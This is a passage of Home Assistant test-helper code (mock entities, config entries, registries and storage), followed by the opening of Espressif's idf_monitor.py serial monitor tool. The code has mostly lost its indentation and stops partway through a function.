def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode("utf-8")
msg = Message(topic, payload, qos, retain)
hass.data["mqtt"]._mqtt_handle_message(msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, datetime_):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(datetime_)})
for task in list(hass.loop._scheduled):
if not isinstance(task, asyncio.TimerHandle):
continue
if task.cancelled():
continue
future_seconds = task.when() - hass.loop.time()
mock_seconds_into_future = datetime_.timestamp() - time.time()
if mock_seconds_into_future >= future_seconds:
task._run()
task.cancel()
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
@ha.callback
def async_fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.async_fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), "fixtures", filename)
with open(path, encoding="utf-8") as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {"entity_id": new_state.entity_id, "new_state": new_state}
if old_state:
event_data["old_state"] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError(f"Integration {component} is already setup")
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or OrderedDict()
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
hass.data[area_registry.DATA_REGISTRY] = registry
return registry
def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
registry.deleted_devices = mock_deleted_entries or OrderedDict()
hass.data[device_registry.DATA_REGISTRY] = registry
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {"name": name, "policy": policy}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(
self,
id=None,
is_owner=False,
is_active=True,
name="Mock User",
system_generated=False,
groups=None,
):
"""Initialize mock user."""
kwargs = {
"is_owner": is_owner,
"is_active": is_active,
"name": name,
"system_generated": system_generated,
"groups": groups or [],
"perm_lookup": None,
}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config
)
assert provider is not None, "Invalid config specified"
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError("Provider already registered")
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(
self,
domain=None,
dependencies=None,
setup=None,
requirements=None,
config_schema=None,
platform_schema=None,
platform_schema_base=None,
async_setup=None,
async_setup_entry=None,
async_unload_entry=None,
async_migrate_entry=None,
async_remove_entry=None,
partial_manifest=None,
):
"""Initialize the mock module."""
self.__name__ = f"homeassistant.components.{domain}"
self.__file__ = f"homeassistant/components/{domain}"
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
# Overlay to be used when generating manifest from this module
self._partial_manifest = partial_manifest
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = AsyncMock(return_value=True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
if async_remove_entry is not None:
self.async_remove_entry = async_remove_entry
def mock_manifest(self):
"""Generate a mock manifest to represent this module."""
return {
**loader.manifest_from_legacy_module(self.DOMAIN, self),
**(self._partial_manifest or {}),
}
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
__file__ = "homeassistant/components/blah/light"
# pylint: disable=invalid-name
def __init__(
self,
setup_platform=None,
dependencies=None,
platform_schema=None,
async_setup_platform=None,
async_setup_entry=None,
scan_interval=None,
):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = AsyncMock(return_value=None)
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self,
hass,
logger=None,
domain="test_domain",
platform_name="test_platform",
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger("homeassistant.helpers.entity_platform")
# Otherwise the constructor will blow up.
if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
)
class MockToggleEntity(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state, unique_id=None):
"""Initialize the mock entity."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the entity if any."""
self.calls.append(("name", {}))
return self._name
@property
def state(self):
"""Return the state of the entity if any."""
self.calls.append(("state", {}))
return self._state
@property
def is_on(self):
"""Return true if entity is on."""
self.calls.append(("is_on", {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the entity on."""
self.calls.append(("turn_on", kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the entity off."""
self.calls.append(("turn_off", kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls) if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(
self,
*,
domain="test",
data=None,
version=1,
entry_id=None,
source=config_entries.SOURCE_USER,
title="Mock Title",
state=None,
options={},
system_options={},
connection_class=config_entries.CONN_CLASS_UNKNOWN,
unique_id=None,
):
"""Initialize a mock config entry."""
kwargs = {
"entry_id": entry_id or uuid.uuid4().hex,
"domain": domain,
"data": data or {},
"system_options": system_options,
"options": options,
"version": version,
"title": title,
"connection_class": connection_class,
"unique_id": unique_id,
}
if source is not None:
kwargs["source"] = source
if state is not None:
kwargs["state"] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
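# A minimal usage sketch (assumptions: `hass` is the usual Home Assistant test fixture
# and the "hue" domain/data/unique_id are purely illustrative). It shows the typical
# pattern of building a MockConfigEntry and registering it before exercising code in a test.
def _example_add_mock_config_entry(hass):
    """Illustrative helper, not used by the test suite itself."""
    entry = MockConfigEntry(domain="hue", data={"host": "1.2.3.4"}, unique_id="abcd")
    entry.add_to_hass(hass)
    return entry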
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, "name", fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, "name", fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if "homeassistant/components" in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding="utf-8")
# Not found
raise FileNotFoundError(f"File not found: {fname}")
return patch.object(yaml_loader, "open", mock_open_f, create=True)
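# A minimal usage sketch (assumption: the "group.yaml" name and contents are purely
# illustrative). Any load_yaml() call whose path ends with a key of the dict receives
# the mocked content instead of touching the filesystem.
def _example_patch_yaml_files():
    """Illustrative helper, not used by the test suite itself."""
    files = {"group.yaml": "living_room:\n  entities: light.kitchen\n"}
    with patch_yaml_files(files):
        pass  # code under test calling load_yaml("group.yaml") sees the mocked content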
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
fut = asyncio.Future()
if exception is not None:
fut.set_exception(exception)
else:
fut.set_result(return_value)
return fut
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
    - count: The number of valid platforms that should be set up
    - domain: The domain to count. Optional; it can usually be
      determined automatically.
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
async def mock_psc(hass, config_input, integration):
"""Mock the prepare_setup_component to capture config."""
domain_input = integration.domain
res = await async_process_component_config(hass, config_input, integration)
config[domain_input] = None if res is None else res.get(domain_input)
_LOGGER.debug(
"Configuration for %s, Validated: %s, Original %s",
domain_input,
config[domain_input],
config_input.get(domain_input),
)
return res
assert isinstance(config, dict)
with patch("homeassistant.config.async_process_component_config", mock_psc):
yield config
if domain is None:
assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
list(config.keys())
)
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert (
res_len == count
), f"setup_component failed, expected {count} got {res_len}: {res}"
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
last_states = {}
for state in states:
restored_state = state.as_dict()
restored_state["attributes"] = json.loads(
json.dumps(restored_state["attributes"], cls=JSONEncoder)
)
last_states[state.entity_id] = restore_state.StoredState(
State.from_dict(restored_state), now
)
data.last_states = last_states
_LOGGER.debug("Restore cache: %s", data.last_states)
assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"
async def get_restore_state_data() -> restore_state.RestoreStateData:
return data
# Patch the singleton task in hass.data to return our new RestoreStateData
hass.data[key] = hass.async_create_task(get_restore_state_data())
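# A minimal usage sketch (assumption: the entity id and state are illustrative).
# mock_restore_cache is typically called before the entities under test are added,
# so they find their previous state when restore_state looks it up.
def _example_mock_restore_cache(hass):
    """Illustrative helper, not used by the test suite itself."""
    mock_restore_cache(hass, [State("light.kitchen", "on")])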
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if "entity_id" in values:
self.entity_id = values["entity_id"]
@property
def name(self):
"""Return the name of the entity."""
return self._handle("name")
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle("should_poll")
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle("unique_id")
@property
def state(self):
"""Return the state of the entity."""
return self._handle("state")
@property
def available(self):
"""Return True if entity is available."""
return self._handle("available")
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle("device_info")
@property
def device_class(self):
"""Info how device should be classified."""
return self._handle("device_class")
@property
def unit_of_measurement(self):
"""Info on the units the entity state is in."""
return self._handle("unit_of_measurement")
@property
def capability_attributes(self):
"""Info about capabilities."""
return self._handle("capability_attributes")
@property
def supported_features(self):
"""Info about supported features."""
return self._handle("supported_features")
@property
def entity_registry_enabled_default(self):
"""Return if the entity should be enabled when first added to the entity registry."""
return self._handle("entity_registry_enabled_default")
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if "data" not in mock_data or "version" not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info("Loading data for %s: %s", store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
_LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
# To ensure that the data can be serialized
data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))
async def mock_remove(store):
"""Remove data."""
data.pop(store.key, None)
with patch(
"homeassistant.helpers.storage.Store._async_load",
side_effect=mock_async_load,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store._write_data",
side_effect=mock_write_data,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store.async_remove",
side_effect=mock_remove,
autospec=True,
):
yield data
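# A minimal usage sketch (assumption: the storage key and payload are illustrative).
# Whatever the code under test writes through helpers.storage ends up JSON-roundtripped
# in the yielded dict, keyed by Store.key.
def _example_mock_storage():
    """Illustrative helper, not used by the test suite itself."""
    with mock_storage({"my_component.config": {"version": 1, "data": {"enabled": True}}}) as stored:
        return stored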
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
store._async_cleanup_final_write_listener()
store._async_cleanup_delay_listener()
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data["system_health"]["info"][domain](hass)
def mock_integration(hass, module):
"""Mock an integration."""
integration = loader.Integration(
hass, f"homeassistant.components.{module.DOMAIN}", None, module.mock_manifest()
)
_LOGGER.info("Adding mock integration: %s", module.DOMAIN)
hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration
hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
return integration
def mock_entity_platform(hass, platform_path, module):
"""Mock a entity platform.
platform_path is in form light.hue. Will create platform
hue.light.
"""
domain, platform_name = platform_path.split(".")
mock_platform(hass, f"{platform_name}.{domain}", module)
def mock_platform(hass, platform_path, module=None):
"""Mock a platform.
platform_path is in form hue.config_flow.
"""
domain, platform_name = platform_path.split(".")
integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {})
module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
if domain not in integration_cache:
mock_integration(hass, MockModule(domain))
_LOGGER.info("Adding mock integration platform: %s", platform_path)
module_cache[platform_path] = module or Mock()
def async_capture_events(hass, event_name):
"""Create a helper that captures events."""
events = []
@ha.callback
def capture_events(event):
events.append(event)
hass.bus.async_listen(event_name, capture_events)
return events
@ha.callback
def async_mock_signal(hass, signal):
"""Catch all dispatches to a signal."""
calls = []
@ha.callback
def mock_signal_handler(*args):
"""Mock service call."""
calls.append(args)
hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler)
return calls
class hashdict(dict):
"""
hashable dict implementation, suitable for use as a key into other dicts.
>>> h1 = hashdict({"apples": 1, "bananas":2})
>>> h2 = hashdict({"bananas": 3, "mangoes": 5})
>>> h1+h2
hashdict(apples=1, bananas=3, mangoes=5)
>>> d1 = {}
>>> d1[h1] = "salad"
>>> d1[h1]
'salad'
>>> d1[h2]
Traceback (most recent call last):
...
KeyError: hashdict(bananas=3, mangoes=5)
based on answers from
http://stackoverflow.com/questions/1151658/python-hashable-dicts
"""
def __key(self):
return tuple(sorted(self.items()))
def __repr__(self): # noqa: D105 no docstring
return ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key())
def __hash__(self): # noqa: D105 no docstring
return hash(self.__key())
def __setitem__(self, key, value): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def __delitem__(self, key): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def clear(self): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def pop(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def popitem(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def setdefault(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def update(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
# update is not ok because it mutates the object
# __add__ is ok because it creates a new object
# while the new object is under construction, it's ok to mutate it
def __add__(self, right): # noqa: D105 no docstring
result = hashdict(self)
dict.update(result, right)
return result
def assert_lists_same(a, b):
"""Compare two lists, ignoring order."""
assert collections.Counter([hashdict(i) for i in a]) == collections.Counter(
[hashdict(i) for i in b]
)
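# A minimal usage sketch: assert_lists_same compares lists of dicts while ignoring
# order, by wrapping each element in the hashable hashdict defined above.
def _example_assert_lists_same():
    """Illustrative helper, not used by the test suite itself."""
    assert_lists_same([{"a": 1}, {"b": 2}], [{"b": 2}, {"a": 1}])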
|
idf_monitor.py
|
#!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run "make (or idf.py) flash" (Ctrl-T Ctrl-F)
# - Run "make (or idf.py) app-flash" (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
from __future__ import unicode_literals
from builtins import chr
from builtins import object
from builtins import bytes
import subprocess
import argparse
import codecs
import datetime
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import shlex
import time
import sys
import serial
import serial.tools.miniterm as miniterm
import threading
import ctypes
import types
from distutils.version import StrictVersion
from io import open
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_Y = '\x19'
CTRL_P = '\x10'
CTRL_L = '\x0c'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be updated)
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
""" Print a message to stderr with colored highlighting """
sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL))
def yellow_print(message):
color_print(message, ANSI_YELLOW)
def red_print(message):
color_print(message, ANSI_RED)
__version__ = "1.1"
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
TAG_SERIAL_FLUSH = 2
# regex matches a potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-"
DEFAULT_PRINT_FILTER = ""
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue, test_mode):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
self.test_mode = test_mode
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
                        # Windows kludge: the console.cancel() method doesn't seem
                        # to unblock getkey() on the Windows implementation, so we
                        # only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
elif self.test_mode:
                        # In testing mode the stdin is connected to a PTY but is not used for any input. For a PTY
# the canceling by fcntl.ioctl isn't working and would hang in self.console.getkey().
# Therefore, we avoid calling it.
while self.alive:
time.sleep(0.1)
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
self.event_queue.put((TAG_KEY, c), False)
finally:
self.console.cleanup()
def _cancel(self):
if os.name == 'posix' and not self.test_mode:
# this is the way cancel() is implemented in pyserial 3.3 or newer,
# older pyserial (3.1+) has cancellation implemented via 'select',
# which does not work when console sends an escape sequence response
#
# even older pyserial (<3.1) does not have this method
#
# on Windows there is a different (also hacky) fix, applied above.
#
# note that TIOCSTI is not implemented in WSL / bash-on-Windows.
# TODO: introduce some workaround to make it work there.
#
# Note: This would throw exception in testing mode when the stdin is connected to PTY.
import fcntl
import termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
self.serial.rts = False
try:
while self.alive:
data = self.serial.read(self.serial.in_waiting or 1)
if len(data):
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except Exception:
pass
class LineMatcher(object):
"""
Assembles a dictionary of filtering rules based on the --print_filter
argument of idf_monitor. Then later it is used to match lines and
determine whether they should be shown on screen or not.
"""
LEVEL_N = 0
LEVEL_E = 1
LEVEL_W = 2
LEVEL_I = 3
LEVEL_D = 4
LEVEL_V = 5
level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,
'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}
def __init__(self, print_filter):
self._dict = dict()
self._re = re.compile(r'^(?:\033\[[01];?[0-9]+m?)?([EWIDV]) \([0-9]+\) ([^:]+): ')
items = print_filter.split()
if len(items) == 0:
self._dict["*"] = self.LEVEL_V # default is to print everything
for f in items:
s = f.split(r':')
if len(s) == 1:
# specifying no warning level defaults to verbose level
lev = self.LEVEL_V
elif len(s) == 2:
if len(s[0]) == 0:
raise ValueError('No tag specified in filter ' + f)
try:
lev = self.level[s[1].upper()]
except KeyError:
raise ValueError('Unknown warning level in filter ' + f)
else:
raise ValueError('Missing ":" in filter ' + f)
self._dict[s[0]] = lev
def match(self, line):
try:
m = self._re.search(line)
if m:
lev = self.level[m.group(1)]
if m.group(2) in self._dict:
return self._dict[m.group(2)] >= lev
return self._dict.get("*", self.LEVEL_N) >= lev
except (KeyError, IndexError):
# Regular line written with something else than ESP_LOG*
# or an empty line.
pass
        # We need something more than "*:N" for printing.
return self._dict.get("*", self.LEVEL_N) > self.LEVEL_N
class SerialStopException(Exception):
"""
This exception is used for stopping the IDF monitor in testing mode.
"""
pass
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, print_filter, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.console = miniterm.Console()
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr, decode_output=True)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
# Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
def getkey_patched(self):
c = self.enc_stdin.read(1)
if c == chr(0x7f):
c = chr(8) # map the BS key (which yields DEL) to backspace
return c
self.console.getkey = types.MethodType(getkey_patched, self.console)
        socket_mode = serial_instance.port.startswith("socket://")  # testing hook - data from the serial port can make the monitor exit
self.serial = serial_instance
self.console_reader = ConsoleReader(self.console, self.event_queue, socket_mode)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
if not os.path.exists(make):
self.make = shlex.split(make) # allow for possibility the "make" arg is a list of arguments (for idf.py)
else:
self.make = make
self.toolchain_prefix = toolchain_prefix
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self.translate_eol = {
"CRLF": lambda c: c.replace("\n", "\r\n"),
"CR": lambda c: c.replace("\n", "\r"),
"LF": lambda c: c.replace("\r", "\n"),
}[eol]
# internal state
self._pressed_menu_key = False
self._last_line_part = b""
self._gdb_buffer = b""
self._pc_address_buffer = b""
self._line_matcher = LineMatcher(print_filter)
self._invoke_processing_last_line_timer = None
self._force_line_print = False
self._output_enabled = True
self._serial_check_exit = socket_mode
self._log_file = None
def invoke_processing_last_line(self):
self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
(event_tag, data) = self.event_queue.get()
if event_tag == TAG_KEY:
self.handle_key(data)
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
if self._invoke_processing_last_line_timer is not None:
self._invoke_processing_last_line_timer.cancel()
self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)
self._invoke_processing_last_line_timer.start()
                    # If no further data is received in the next short period
                    # of time then the _invoke_processing_last_line_timer
                    # generates an event which will result in the finishing of
                    # the last line. This is a fix for handling lines sent
                    # without EOL.
elif event_tag == TAG_SERIAL_FLUSH:
self.handle_serial_input(data, finalize_line=True)
else:
raise RuntimeError("Bad event data %r" % ((event_tag,data),))
except SerialStopException:
sys.stderr.write(ANSI_NORMAL + "Stopping condition has been received\n")
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
self.stop_logging()
# Cancelling _invoke_processing_last_line_timer is not
# important here because receiving empty data doesn't matter.
self._invoke_processing_last_line_timer = None
except Exception:
pass
sys.stderr.write(ANSI_NORMAL + "\n")
def handle_key(self, key):
if self._pressed_menu_key:
self.handle_menu_key(key)
self._pressed_menu_key = False
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
self.console_reader.stop()
self.serial_reader.stop()
else:
try:
key = self.translate_eol(key)
self.serial.write(codecs.encode(key))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
except UnicodeEncodeError:
pass # this can happen if a non-ascii character was passed, ignoring
def handle_serial_input(self, data, finalize_line=False):
sp = data.split(b'\n')
